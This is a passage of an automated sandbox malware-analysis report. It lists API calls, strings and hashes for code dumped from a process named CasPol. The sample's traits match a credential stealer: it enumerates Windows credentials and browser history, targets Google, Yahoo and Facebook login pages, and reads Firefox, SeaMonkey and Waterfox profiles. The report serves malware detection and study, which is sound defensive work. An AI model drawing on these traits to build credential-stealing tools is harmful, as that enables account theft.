                                                                                                                      • Part of subcall function 0040CC26: GetFileSize.KERNEL32(00000000,00000000,000003FF,?,00000000,0040B7D4,?,?,?,?,000003FF,?,?,?,00445FAE,?), ref: 0040CC44
                                                                                                                      • Part of subcall function 0040CC26: CloseHandle.KERNELBASE(?,?,000000FF,0000FDE9), ref: 0040CC98
                                                                                                                      • Part of subcall function 0040CCF0: _wcsicmp.MSVCRT ref: 0040CD2A
                                                                                                                    • memset.MSVCRT ref: 0040BC75
                                                                                                                    • memset.MSVCRT ref: 0040BC8C
                                                                                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,0044E518,000000FF,?,00000FFF,00000000,00000000,?,?,?,0040B7D4,?,?), ref: 0040BCA8
                                                                                                                    • memcmp.MSVCRT(?,00000000,00000005,?,?,?,0040B7D4,?,?,?,?,000003FF,?,?,?,00445FAE), ref: 0040BCD6
                                                                                                                    • memcpy.MSVCRT(00000024,?,00000020,?,00000000,00000000,?,?,?,?,?,?,?,0040B7D4), ref: 0040BD2B
                                                                                                                    • LocalFree.KERNEL32(?,?,00000000,00000000,?,?,?,?,?,?,?,0040B7D4), ref: 0040BD3D
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000B.00000002.2474939299.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_11_2_400000_CasPol.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: memset$ByteCharCloseFileFreeHandleLocalMultiSizeWide_wcsicmpmemcmpmemcpy
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 115830560-3916222277
                                                                                                                    • Opcode ID: 2c6b40c8534ef55c53201c5afea9c0c191c5eda6ef18d79290db5ec64fa84378
                                                                                                                    • Instruction ID: 00a8249a540342db609c93f8c1f67c79963b4134db5221072d0e6ece1bb2d715
                                                                                                                    • Opcode Fuzzy Hash: 2c6b40c8534ef55c53201c5afea9c0c191c5eda6ef18d79290db5ec64fa84378
                                                                                                                    • Instruction Fuzzy Hash: 3F41B372900219ABDB10ABA5CC85ADEB7ACEF04314F01057BB509F7292D7789E45CA99

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    control_flow_graph 789 41837f-4183bf 790 4183c1-4183cc call 418197 789->790 791 4183dc-4183ec call 418160 789->791 796 4183d2-4183d8 790->796 797 418517-41851d 790->797 798 4183f6-41840b 791->798 799 4183ee-4183f1 791->799 796->791 800 418417-418423 798->800 801 41840d-418415 798->801 799->797 802 418427-418442 call 41739b 800->802 801->802 805 418444-41845d CreateFileW 802->805 806 41845f-418475 CreateFileA 802->806 807 418477-41847c 805->807 806->807 808 4184c2-4184c7 807->808 809 41847e-418495 GetLastError free 807->809 812 4184d5-418501 memset call 418758 808->812 813 4184c9-4184d3 808->813 810 4184b5-4184c0 call 444706 809->810 811 418497-4184b3 call 41837f 809->811 810->797 811->797 819 418506-418515 free 812->819 813->812 819->797
                                                                                                                    APIs
                                                                                                                    • CreateFileW.KERNELBASE(?,-7FBE829D,00000003,00000000,?,?,00000000), ref: 00418457
                                                                                                                    • CreateFileA.KERNEL32(?,-7FBE829D,00000003,00000000,|A,00417CE3,00000000), ref: 0041846F
                                                                                                                    • GetLastError.KERNEL32 ref: 0041847E
                                                                                                                    • free.MSVCRT ref: 0041848B
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000B.00000002.2474939299.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_11_2_400000_CasPol.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: CreateFile$ErrorLastfree
                                                                                                                    • String ID: |A
                                                                                                                    • API String ID: 77810686-1717621600
                                                                                                                    • Opcode ID: b73738cfafb11dafaf653c45b8d30767a4f0487cb759c2014a2d8a4f30590433
                                                                                                                    • Instruction ID: 73005d91fce95ddd83c4435d1527c7398ec28b7193468e33704956b81d718a95
                                                                                                                    • Opcode Fuzzy Hash: b73738cfafb11dafaf653c45b8d30767a4f0487cb759c2014a2d8a4f30590433
                                                                                                                    • Instruction Fuzzy Hash: 50412472508306AFD710CF25DC4179BBBE5FF84328F14492EF8A492290EB78D9448B96

                                                                                                                    Control-flow Graph

                                                                                                                    APIs
                                                                                                                    • memset.MSVCRT ref: 0041249C
                                                                                                                    • ??2@YAPAXI@Z.MSVCRT(00002A88), ref: 004124D2
                                                                                                                    • ??2@YAPAXI@Z.MSVCRT(00000350), ref: 00412510
                                                                                                                    • GetModuleHandleW.KERNEL32(00000000,0000000E), ref: 00412582
                                                                                                                    • LoadIconW.USER32(00000000,00000065), ref: 0041258B
                                                                                                                    • wcscpy.MSVCRT ref: 004125A0
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000B.00000002.2474939299.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_11_2_400000_CasPol.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ??2@$HandleIconLoadModulememsetwcscpy
                                                                                                                    • String ID: r!A
                                                                                                                    • API String ID: 2791114272-628097481
                                                                                                                    • Opcode ID: c8dffcb2de6473715ddac6d72e3c76979a49d8854762dd44dbb162fd21f04a95
                                                                                                                    • Instruction ID: f2e108ad35b37ee9f58e8ef6409d1766b43f0b07df47584fb449e80907097569
                                                                                                                    • Opcode Fuzzy Hash: c8dffcb2de6473715ddac6d72e3c76979a49d8854762dd44dbb162fd21f04a95
                                                                                                                    • Instruction Fuzzy Hash: 0431A1B19013889FEB30EF669C896CAB7E8FF44314F00852FE90CCB241DBB946548B49

                                                                                                                    Control-flow Graph

                                                                                                                    APIs
                                                                                                                      • Part of subcall function 0040B1AB: free.MSVCRT ref: 0040B1AE
                                                                                                                      • Part of subcall function 0040B1AB: free.MSVCRT ref: 0040B1B6
                                                                                                                      • Part of subcall function 0040AA04: free.MSVCRT ref: 0040AA0B
                                                                                                                      • Part of subcall function 0040C274: memset.MSVCRT ref: 0040C298
                                                                                                                      • Part of subcall function 0040C274: FindFirstUrlCacheEntryW.WININET(visited:,?,80000001), ref: 0040C30D
                                                                                                                      • Part of subcall function 0040C274: wcschr.MSVCRT ref: 0040C324
                                                                                                                      • Part of subcall function 0040C274: wcschr.MSVCRT ref: 0040C344
                                                                                                                      • Part of subcall function 0040C274: FindNextUrlCacheEntryW.WININET(?,?,80000001), ref: 0040C369
                                                                                                                      • Part of subcall function 0040C274: GetLastError.KERNEL32 ref: 0040C373
                                                                                                                      • Part of subcall function 0040C3C3: memset.MSVCRT ref: 0040C439
                                                                                                                      • Part of subcall function 0040C3C3: RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,?,?,00000000,?), ref: 0040C467
                                                                                                                      • Part of subcall function 0040C3C3: _wcsupr.MSVCRT ref: 0040C481
                                                                                                                      • Part of subcall function 0040C3C3: memset.MSVCRT ref: 0040C4D0
                                                                                                                      • Part of subcall function 0040C3C3: RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,000000FF,?,?,?,?,00000000), ref: 0040C4FB
                                                                                                                    • _wcslwr.MSVCRT ref: 0040C817
                                                                                                                      • Part of subcall function 0040C634: wcslen.MSVCRT ref: 0040C65F
                                                                                                                      • Part of subcall function 0040C634: memset.MSVCRT ref: 0040C6BF
                                                                                                                    • wcslen.MSVCRT ref: 0040C82C
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000B.00000002.2474939299.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_11_2_400000_CasPol.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: memset$free$CacheEntryEnumFindValuewcschrwcslen$ErrorFirstLastNext_wcslwr_wcsupr
                                                                                                                    • String ID: /$/$http://www.facebook.com/$https://login.yahoo.com/config/login$https://www.google.com/accounts/servicelogin
                                                                                                                    • API String ID: 2936932814-4196376884
                                                                                                                    • Opcode ID: 2e55d37c3c93c49036042ab263f5962c07f69a8f438a79de627d7f97dd271f33
                                                                                                                    • Instruction ID: 5b72bd72183a146cc5fb8da473a5bce975bbff0c760a192580a28ed18ba85502
                                                                                                                    • Opcode Fuzzy Hash: 2e55d37c3c93c49036042ab263f5962c07f69a8f438a79de627d7f97dd271f33
                                                                                                                    • Instruction Fuzzy Hash: 42218272A00244A6CF10BB6A9C8589E7B68EF44744B10457BB804B7293D67CDE85DB9D
                                                                                                                    APIs
                                                                                                                    • GetModuleHandleW.KERNEL32(00000000,00000000,?,?), ref: 0040B5A5
                                                                                                                    • FindResourceW.KERNELBASE(00000000,00000032,BIN), ref: 0040B5B6
                                                                                                                    • LoadResource.KERNEL32(00000000,00000000), ref: 0040B5C4
                                                                                                                    • SizeofResource.KERNEL32(?,00000000), ref: 0040B5D4
                                                                                                                    • LockResource.KERNEL32(00000000), ref: 0040B5DD
                                                                                                                    • memcpy.MSVCRT(00000000,00000000,00000000), ref: 0040B60D
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000B.00000002.2474939299.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_11_2_400000_CasPol.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Resource$FindHandleLoadLockModuleSizeofmemcpy
                                                                                                                    • String ID: BIN
                                                                                                                    • API String ID: 1668488027-1015027815
                                                                                                                    • Opcode ID: 6cadd12acd146c90b5568bc01b4485451bf9b169e768bef5838699a2d497f07b
                                                                                                                    • Instruction ID: e905eb6dc449d61379ecdc49350c1a2f8866219970738eecada31b95dd052af9
                                                                                                                    • Opcode Fuzzy Hash: 6cadd12acd146c90b5568bc01b4485451bf9b169e768bef5838699a2d497f07b
                                                                                                                    • Instruction Fuzzy Hash: 5E11C636C00225BBD7116BE2DC09AAFBA78FF85755F010476F81072292DB794D018BED
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000), ref: 00404398
                                                                                                                      • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000), ref: 004043AC
                                                                                                                      • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000), ref: 004043BF
                                                                                                                      • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000), ref: 004043D3
                                                                                                                      • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000), ref: 004043E7
                                                                                                                    • CredEnumerateW.ADVAPI32(00000000,00000000,?,?,?,00000000,?), ref: 0040BDE9
                                                                                                                    • wcslen.MSVCRT ref: 0040BE06
                                                                                                                    • wcsncmp.MSVCRT ref: 0040BE38
                                                                                                                    • memset.MSVCRT ref: 0040BE91
                                                                                                                    • memcpy.MSVCRT(?,?,?,00000001,?,?,?,00000000,?), ref: 0040BEB2
                                                                                                                    • _wcsnicmp.MSVCRT ref: 0040BEFC
                                                                                                                    • wcschr.MSVCRT ref: 0040BF24
                                                                                                                    • LocalFree.KERNEL32(?,?,?,?,00000001,?,?,?,00000000,?), ref: 0040BF48
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000B.00000002.2474939299.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_11_2_400000_CasPol.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: AddressProc$CredEnumerateFreeLocal_wcsnicmpmemcpymemsetwcschrwcslenwcsncmp
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 697348961-0
                                                                                                                    • Opcode ID: 4320d3521706fdf8c6ed48fb05be967b0956d3d4dbd01890db6896aba47bd834
                                                                                                                    • Instruction ID: 79a9ca8399314c5bcb3e205da5602351372edcdcc58f79068602210d8f55f42f
                                                                                                                    • Opcode Fuzzy Hash: 4320d3521706fdf8c6ed48fb05be967b0956d3d4dbd01890db6896aba47bd834
                                                                                                                    • Instruction Fuzzy Hash: 1851E9B5D002099FCF20DFA5C8859AEBBF9FF48304F10452AE919F7251E734A9458F69
                                                                                                                    APIs
                                                                                                                    • memset.MSVCRT ref: 00403CBF
                                                                                                                    • memset.MSVCRT ref: 00403CD4
                                                                                                                    • memset.MSVCRT ref: 00403CE9
                                                                                                                    • memset.MSVCRT ref: 00403CFE
                                                                                                                    • memset.MSVCRT ref: 00403D13
                                                                                                                      • Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
                                                                                                                      • Part of subcall function 00414C2E: RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
                                                                                                                      • Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC
                                                                                                                      • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                                      • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                                      • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                                      • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                                      • Part of subcall function 0040414F: memset.MSVCRT ref: 00404172
                                                                                                                      • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041D6
                                                                                                                      • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041E7
                                                                                                                      • Part of subcall function 0040414F: memset.MSVCRT ref: 00404200
                                                                                                                      • Part of subcall function 0040414F: memset.MSVCRT ref: 00404215
                                                                                                                      • Part of subcall function 0040414F: _snwprintf.MSVCRT ref: 0040422F
                                                                                                                      • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 00404242
                                                                                                                    • memset.MSVCRT ref: 00403DDA
                                                                                                                      • Part of subcall function 004099C6: wcslen.MSVCRT ref: 004099CD
                                                                                                                      • Part of subcall function 004099C6: memcpy.MSVCRT(?,?,00000104,?,0040BAA5,00445FAE), ref: 004099E3
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000B.00000002.2474939299.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_11_2_400000_CasPol.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: memset$wcscpy$wcslen$Close_snwprintfmemcpywcscat
                                                                                                                    • String ID: Waterfox$Waterfox\Profiles
                                                                                                                    • API String ID: 3527940856-11920434
                                                                                                                    • Opcode ID: fa7a89f4834ef8b5b40aee994800d4865c67d250ea9d7d7a0362dcd02f226988
                                                                                                                    • Instruction ID: d72014143a293005b417e5222852f61d3cfc405123c5957a7e6d01a12b636873
                                                                                                                    • Opcode Fuzzy Hash: fa7a89f4834ef8b5b40aee994800d4865c67d250ea9d7d7a0362dcd02f226988
                                                                                                                    • Instruction Fuzzy Hash: 1E4133B294012C7ADB20EB56DC85ECF777CEF85314F1180ABB509B2181DA745B948FAA
                                                                                                                    APIs
                                                                                                                    • memset.MSVCRT ref: 00403E50
                                                                                                                    • memset.MSVCRT ref: 00403E65
                                                                                                                    • memset.MSVCRT ref: 00403E7A
                                                                                                                    • memset.MSVCRT ref: 00403E8F
                                                                                                                    • memset.MSVCRT ref: 00403EA4
                                                                                                                      • Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
                                                                                                                      • Part of subcall function 00414C2E: RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
                                                                                                                      • Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC
                                                                                                                      • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                                      • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                                      • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                                      • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                                      • Part of subcall function 0040414F: memset.MSVCRT ref: 00404172
                                                                                                                      • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041D6
                                                                                                                      • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041E7
                                                                                                                      • Part of subcall function 0040414F: memset.MSVCRT ref: 00404200
                                                                                                                      • Part of subcall function 0040414F: memset.MSVCRT ref: 00404215
                                                                                                                      • Part of subcall function 0040414F: _snwprintf.MSVCRT ref: 0040422F
                                                                                                                      • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 00404242
                                                                                                                    • memset.MSVCRT ref: 00403F6B
                                                                                                                      • Part of subcall function 004099C6: wcslen.MSVCRT ref: 004099CD
                                                                                                                      • Part of subcall function 004099C6: memcpy.MSVCRT(?,?,00000104,?,0040BAA5,00445FAE), ref: 004099E3
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000B.00000002.2474939299.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_11_2_400000_CasPol.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: memset$wcscpy$wcslen$Close_snwprintfmemcpywcscat
                                                                                                                    • String ID: Mozilla\SeaMonkey$Mozilla\SeaMonkey\Profiles
                                                                                                                    • API String ID: 3527940856-2068335096
                                                                                                                    • Opcode ID: 4e0f951fde323d6a6ece029bc301e1d43e2d4c472937678d86f27e99a49f71a6
                                                                                                                    • Instruction ID: badb9319ce56d3a3e0b5d4601891faab39f88fc9b3936f94b46873e2979bc7df
                                                                                                                    • Opcode Fuzzy Hash: 4e0f951fde323d6a6ece029bc301e1d43e2d4c472937678d86f27e99a49f71a6
                                                                                                                    • Instruction Fuzzy Hash: F94133B294012CBADB20EB56DC85FCF777CAF85314F1180A7B509F2181DA785B848F6A
                                                                                                                    APIs
                                                                                                                    • memset.MSVCRT ref: 00403FE1
                                                                                                                    • memset.MSVCRT ref: 00403FF6
                                                                                                                    • memset.MSVCRT ref: 0040400B
                                                                                                                    • memset.MSVCRT ref: 00404020
                                                                                                                    • memset.MSVCRT ref: 00404035
                                                                                                                      • Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
                                                                                                                      • Part of subcall function 00414C2E: RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
                                                                                                                      • Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC
                                                                                                                      • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                                      • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                                      • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                                      • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                                      • Part of subcall function 0040414F: memset.MSVCRT ref: 00404172
                                                                                                                      • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041D6
                                                                                                                      • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041E7
                                                                                                                      • Part of subcall function 0040414F: memset.MSVCRT ref: 00404200
                                                                                                                      • Part of subcall function 0040414F: memset.MSVCRT ref: 00404215
                                                                                                                      • Part of subcall function 0040414F: _snwprintf.MSVCRT ref: 0040422F
                                                                                                                      • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 00404242
                                                                                                                    • memset.MSVCRT ref: 004040FC
                                                                                                                      • Part of subcall function 004099C6: wcslen.MSVCRT ref: 004099CD
                                                                                                                      • Part of subcall function 004099C6: memcpy.MSVCRT(?,?,00000104,?,0040BAA5,00445FAE), ref: 004099E3
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000B.00000002.2474939299.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_11_2_400000_CasPol.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: memset$wcscpy$wcslen$Close_snwprintfmemcpywcscat
                                                                                                                    • String ID: Mozilla\Firefox$Mozilla\Firefox\Profiles
                                                                                                                    • API String ID: 3527940856-3369679110
                                                                                                                    • Opcode ID: e8b210b2701fced3ec1563677da70e7bdaed7d27e85ea88c95246b73557c45d8
                                                                                                                    • Instruction ID: a33c26704871042caa7cb74448a1974e70df039046fe21947f04a6d8cbe9f93a
                                                                                                                    • Opcode Fuzzy Hash: e8b210b2701fced3ec1563677da70e7bdaed7d27e85ea88c95246b73557c45d8
                                                                                                                    • Instruction Fuzzy Hash: 354134B294012CBADB20EB56DC85ECF777CAF85314F1180A7B509B3181EA745B948F6A
                                                                                                                    APIs
                                                                                                                    • memcpy.MSVCRT(00000048,00451D40,0000002C,000003FF,00445FAE,?,00000000,?,0040B879), ref: 004444E3
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000B.00000002.2474939299.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_11_2_400000_CasPol.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: memcpy
                                                                                                                    • String ID: BINARY$NOCASE$RTRIM$main$no such vfs: %s$temp
                                                                                                                    • API String ID: 3510742995-2641926074
                                                                                                                    • Opcode ID: 821e0fdd347fba4e0959882d1eed221cd0f9849de050a87fd0c537b7ccc40074
                                                                                                                    • Instruction ID: 565814064bb2237b40e40c3ad6633df45ffc5137317807aec9a32ad89077b3bf
                                                                                                                    • Opcode Fuzzy Hash: 821e0fdd347fba4e0959882d1eed221cd0f9849de050a87fd0c537b7ccc40074
                                                                                                                    • Instruction Fuzzy Hash: BA7119B1600701BFE710AF16CC81B66B7A8BB85319F11452FF4189B742D7BDED908B99
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 0040B633: free.MSVCRT ref: 0040B63A
                                                                                                                      • Part of subcall function 0044553B: memset.MSVCRT ref: 004455C2
                                                                                                                      • Part of subcall function 0044553B: wcsrchr.MSVCRT ref: 004455DA
                                                                                                                    • memset.MSVCRT ref: 004033B7
                                                                                                                    • memcpy.MSVCRT(?,00000000,0000121C), ref: 004033D0
                                                                                                                    • wcscmp.MSVCRT ref: 004033FC
                                                                                                                    • _wcsicmp.MSVCRT ref: 00403439
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000B.00000002.2474939299.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_11_2_400000_CasPol.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: memset$_wcsicmpfreememcpywcscmpwcsrchr
                                                                                                                    • String ID: $0.@
                                                                                                                    • API String ID: 2758756878-1896041820
                                                                                                                    • Opcode ID: f66ff37cfebf4588bd42dffc34473b3fc2588101413319c72ad25ea5b69c0f44
                                                                                                                    • Instruction ID: ab192eb15c9642abc1a13bae453f9d52c7669558764b377fc560e22e349fc473
                                                                                                                    • Opcode Fuzzy Hash: f66ff37cfebf4588bd42dffc34473b3fc2588101413319c72ad25ea5b69c0f44
                                                                                                                    • Instruction Fuzzy Hash: 6B414A71A0C3819BD770EF65C885A8BB7E8AF86314F004D2FE48C97681DB3899458B5B
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                                                                      • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                                                                                                                      • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                                                                      • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                                                                      • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                                                                                                                      • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                                                                                                                    • GetProcAddress.KERNEL32(00000000,00000000), ref: 004449E7
                                                                                                                    • GetProcAddress.KERNEL32(00000000,00000000), ref: 004449F8
                                                                                                                    • GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A09
                                                                                                                    • GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A1A
                                                                                                                    • GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A2B
                                                                                                                    • GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A3C
                                                                                                                    • GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A4D
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000B.00000002.2474939299.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_11_2_400000_CasPol.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: AddressProc$LibraryLoad$DirectorySystemmemsetwcscatwcscpy
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2941347001-0
                                                                                                                    • Opcode ID: 71f7015b8efbcabf0d8a3174310d871b9f234e636c99dab6741889365bf8ff35
                                                                                                                    • Instruction ID: 45112ec7679d7541be2eaee67b01953ccf91f0241e5cd71b41190719d78dca83
                                                                                                                    • Opcode Fuzzy Hash: 71f7015b8efbcabf0d8a3174310d871b9f234e636c99dab6741889365bf8ff35
                                                                                                                    • Instruction Fuzzy Hash: 2E115871840700EDEA207F72DD0FF2B7AA5EF40B14F10882EF555594E1EBB6A8119E9C
                                                                                                                    APIs
                                                                                                                    • memset.MSVCRT ref: 00403C09
                                                                                                                    • memset.MSVCRT ref: 00403C1E
                                                                                                                      • Part of subcall function 00409719: wcslen.MSVCRT ref: 0040971A
                                                                                                                      • Part of subcall function 00409719: wcscat.MSVCRT ref: 00409732
                                                                                                                    • wcscat.MSVCRT ref: 00403C47
                                                                                                                      • Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
                                                                                                                      • Part of subcall function 00414C2E: RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
                                                                                                                      • Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC
                                                                                                                    • wcscat.MSVCRT ref: 00403C70
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000B.00000002.2474939299.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_11_2_400000_CasPol.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: memsetwcscat$Closewcscpywcslen
                                                                                                                    • String ID: Mozilla\Firefox\Profiles$Mozilla\Profiles
                                                                                                                    • API String ID: 3249829328-1174173950
                                                                                                                    • Opcode ID: 5af024c53119846c6cf23d5d39710aba0b9f01952ad673d04fbaa3fd9d46c714
                                                                                                                    • Instruction ID: 5219a381a5be6f9fff484f4b9c8ff18b49dc44b18064e24db21ac924a7a96902
                                                                                                                    • Opcode Fuzzy Hash: 5af024c53119846c6cf23d5d39710aba0b9f01952ad673d04fbaa3fd9d46c714
                                                                                                                    • Instruction Fuzzy Hash: 4401A9B294032C76DB207B669C86ECF672C9F45358F01447FB504B7182D9785E844AA9
                                                                                                                    APIs
                                                                                                                    • memset.MSVCRT ref: 0040A824
                                                                                                                    • GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                                                                                                                    • wcscpy.MSVCRT ref: 0040A854
                                                                                                                    • wcscat.MSVCRT ref: 0040A86A
                                                                                                                    • LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                                                                                                                    • LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000B.00000002.2474939299.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_11_2_400000_CasPol.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: LibraryLoad$DirectorySystemmemsetwcscatwcscpy
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 669240632-0
                                                                                                                    • Opcode ID: 82c8cf326d92d3b179650df20de3df9a559229a48382c0fcbe0adb46b34a8860
                                                                                                                    • Instruction ID: 21688b76284891f368be2c5f4feed5723597baa153f24eadc702144372ba9d0b
                                                                                                                    • Opcode Fuzzy Hash: 82c8cf326d92d3b179650df20de3df9a559229a48382c0fcbe0adb46b34a8860
                                                                                                                    • Instruction Fuzzy Hash: A6F0A472D0022467DF207B65AC46B8A3B6CBF01754F008072F908B71D2EB789A55CFDA
                                                                                                                    APIs
                                                                                                                    • wcschr.MSVCRT ref: 00414458
                                                                                                                    • _snwprintf.MSVCRT ref: 0041447D
                                                                                                                    • WritePrivateProfileStringW.KERNEL32(?,?,?,?), ref: 0041449B
                                                                                                                    • GetPrivateProfileStringW.KERNEL32(?,?,?,?,?,?), ref: 004144B3
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
